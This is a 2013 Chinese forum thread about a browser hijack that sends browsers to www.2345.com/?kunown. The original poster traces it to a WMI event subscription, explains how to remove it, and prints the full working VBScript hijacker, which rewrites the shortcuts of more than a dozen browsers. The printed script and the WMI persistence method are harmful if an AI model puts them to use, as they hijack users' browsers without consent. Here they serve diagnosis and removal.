浏览器运行被劫持到www.2345.com/?kunown的解决方法

显示全部楼层 · 发表于 2013-2-1 15:44:11

头一回被劫持了,发帖记录下,还有些经验性的东西
------------------------------------------------------
现象描述:任务栏的浏览器快捷方式被强制添加www.2345.com/?kunown参数导致浏览器运行会打开改url
解决思路:第一反应任务管理器,未发现不明进程(现在不排除被注入进程的可能)...
第二,找注册表,搜索"www.2345.com/?kunown"仅找到一条,就是我刚才发现问题的浏览器.exe的注册表信息,显然不是罪恶的根源
第三,服务项,启动项等常规检查未发现任何可疑
第四,我把那个浏览器快捷方式给改回来了,但是过了一会我发现他又被修改了,然后我就怀疑是计划任务了,但是依然无所收获
第五,开了ProcessMonitor监视发现问题了,每30分钟scrcons.exe自启动并修改浏览器快捷方式的启动参数，然后自动关闭.
第六,搜索发现是通过WMI的定时自动运行脚本(vbs脚本),遗憾的发现原来这问题早有解决

WMITool下载地址http://www.microsoft.com/en-us/download/details.aspx?id=24045
开UAC的最好管理员运行上述工具
以下纯引用

1安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root\subscription”，确定
2点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，选择view instant properties
3查看ScriptText项可知，这是一段VBScript调用系统服务间隔30分钟执行一次，将所有浏览器调用加上“http://www.2345.com/?kunown”！
4：在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除！

附脚本源码("用户名"那位置是计算机当前的用户名,我给改了)

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\用户名\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\用户名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:If oShellLink.Arguments <> link Then:oShellLink.Arguments = link:oShellLink.Save:End If:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:If oShellLink.Arguments <> link Then:oShellLink.Arguments = link:oShellLink.Save:End If:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:If oShellLink.Arguments <> link Then:oShellLink.Arguments = link:oShellLink.Save:End If:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:If oShellLink.Arguments <> link Then:oShellLink.Arguments = link:oShellLink.Save:End If:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:If oShellLink.Arguments <> link Then:oShellLink.Arguments = link:oShellLink.Save:End If:End If:End If:Next:End If

复制代码

源码可见受影响的浏览器有以下:
IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"
看来这货挺新鲜的,比较新的浏览器都有,呵呵
P.S.:如果这个玩意每个数小时运行一次就

...

显示全部楼层 · 发表于 2013-2-1 16:16:55

不错的文章，学习了，一般人遇到这种劫持还真头痛！期待楼主再发类似的好帖哈，对劫持说不！

显示全部楼层 · 发表于 2013-2-1 22:11:43

我也曾经被这问题困扰了很久。
http://bbs.kafan.cn/thread-1414457-1-1.html

显示全部楼层 · 发表于 2013-2-1 22:13:35

adolfh 发表于 2013-2-1 22:11
我也曾经被这问题困扰了很久。
http://bbs.kafan.cn/thread-1414457-1-1.html

无看见楼内一堆卫士,表示无语...

2013年2月1日星期五 22:13:34 by lyttmonkey
来自奇葩的神器：Opera/9.80 (Windows NT 6.2; WOW64) Presto/2.12.388 Version/12.13 (en)

显示全部楼层 · 发表于 2013-2-1 22:15:30

lyttmonkey 发表于 2013-2-1 22:13
无看见楼内一堆卫士,表示无语...

我也很无语，但最后是用金山急救箱解决的。

显示全部楼层 · 发表于 2013-2-2 13:20:23

本帖最后由 ljzflxb 于 2013-2-2 13:28 编辑

这个2345网站确实很流氓，我今天用它上了一次网，它就给我的百度主页给改了，成了他妈的2345了！！！建议大家只要看到它就把它给删除！！！

显示全部楼层 · 发表于 2013-2-2 13:39:57

ljzflxb 发表于 2013-2-2 13:20
这个2345网站确实很流氓，我今天用它上了一次网，它就给我的百度主页给改了，成了他妈的2345了！！！建议大 ...

hosts屏蔽

显示全部楼层 · 发表于 2013-2-2 14:01:14

lyttmonkey 发表于 2013-2-2 13:39
hosts屏蔽

hosts屏蔽了我其它浏览器上网怎么办？是不是在那里找到它去把它删除？

显示全部楼层 · 发表于 2013-2-2 14:17:48

ljzflxb 发表于 2013-2-2 14:01
hosts屏蔽了我其它浏览器上网怎么办？是不是在那里找到它去把它删除？

垃圾站点要他作甚

2013年2月2日星期六 14:17:48 by lyttmonkey
来自奇葩的神器：Opera/9.80 (Windows NT 6.2; WOW64) Presto/2.12.388 Version/12.13 (en)

显示全部楼层 · 发表于 2013-2-2 14:24:29

lyttmonkey 发表于 2013-2-2 14:17
垃圾站点要他作甚

我的hosts主要是opera浏览器的一些常用网站，删除后会影响速度。

[其他] 浏览器运行被劫持到www.2345.com/?kunown的解决方法

评分